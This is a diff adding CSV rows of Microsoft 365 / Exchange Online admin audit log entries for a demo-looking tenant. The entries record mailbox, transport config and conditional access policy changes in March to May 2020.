+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T21:43:46Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T21:43:44Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T21:43:39Z,,,Set-TransportConfig,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com""
+  },
+  {
+    ""Name"": ""OrganizationFederatedMailbox"",
+    ""Value"": ""FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@seccxpninja.onmicrosoft.com""
+  }
+]"
+2020-04-23T21:43:29Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""UMGrammar"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""MaxSendSize"",
+    ""Value"": ""1 GB (1,073,741,824 bytes)""
+  },
+  {
+    ""Name"": ""MailRouting"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""MessageTracking"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""OMEncryption"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""OABGen"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ClientExtensions"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}""
+  },
+  {
+    ""Name"": ""GMGen"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SuiteServiceStorage"",
+    ""Value"": ""True""
+  }
+]"
+2020-04-23T21:42:53Z,,,Set-TransportConfig,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com""
+  },
+  {
+    ""Name"": ""SupervisionTags"",
+    ""Value"": ""Reject;Allow""
+  }
+]"
+2020-04-23T21:43:10Z,,,Install-AdminAuditLogConfig,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""Organization"",
+    ""Value"": ""seccxpninja.onmicrosoft.com""
+  }
+]"
+2020-04-23T21:43:08Z,,,Install-DefaultSharingPolicy,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""Organization"",
+    ""Value"": ""seccxpninja.onmicrosoft.com""
+  }
+]"
+2020-03-24T14:57:44Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-24T14:55:27.3412438Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/24/2020 2:57:43 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-24T17:00:42Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-24T16:30:44.5102062Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/24/2020 5:00:42 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-24T17:33:11Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-24T16:30:44.5102062Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/24/2020 5:33:10 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-24T17:00:41Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-24T16:30:44.5102062Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/24/2020 5:00:41 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-24T14:57:13Z,,,New-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Organization"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com""
+  }
+]"
+2020-03-24T14:57:44Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-24T14:55:27.3412438Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/24/2020 2:57:43 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-24T14:56:52Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-24T14:55:27.3412438Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/24/2020 2:56:51 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-24T15:22:13Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-24T14:55:27.3412438Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/24/2020 3:22:12 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-24T15:22:14Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-24T14:55:27.3412438Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/24/2020 3:22:13 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-24T15:25:03Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\3d95d156-8ff6-433d-ae96-6da071c96c99""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/24/2020 3:25:02 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-24T16:44:25Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-24T16:30:44.5102062Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/24/2020 4:44:24 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-24T16:44:25Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-24T16:30:44.5102062Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/24/2020 4:44:25 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-24T15:08:48Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\3d95d156-8ff6-433d-ae96-6da071c96c99""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/24/2020 3:08:48 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-24T15:05:21Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-24T14:55:27.3412438Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/24/2020 3:05:19 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-24T15:56:56Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\3d95d156-8ff6-433d-ae96-6da071c96c99""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/24/2020 3:56:56 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-24T15:54:15Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-24T14:55:27.3412438Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/24/2020 3:54:14 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-24T16:31:40Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-24T16:30:44.5102062Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/24/2020 4:31:40 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-24T16:36:36Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-24T16:30:44.5102062Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/24/2020 4:36:36 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-24T15:02:10Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\3d95d156-8ff6-433d-ae96-6da071c96c99""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/24/2020 3:02:10 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-24T15:08:50Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\3d95d156-8ff6-433d-ae96-6da071c96c99""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/24/2020 3:08:50 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-24T15:05:18Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-24T14:55:27.3412438Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/24/2020 3:05:17 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-24T15:54:16Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-24T14:55:27.3412438Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/24/2020 3:54:16 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-01T10:55:17Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-01T10:55:14Z,,,Remove-MailboxLocation,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a784e90e-3dc4-4a60-b787-63926b45bbe5""
+  },
+  {
+    ""Name"": ""IgnoreLegalHold"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Confirm"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-01T03:11:37Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/1/2020 3:11:37 AM""
+  },
+  {
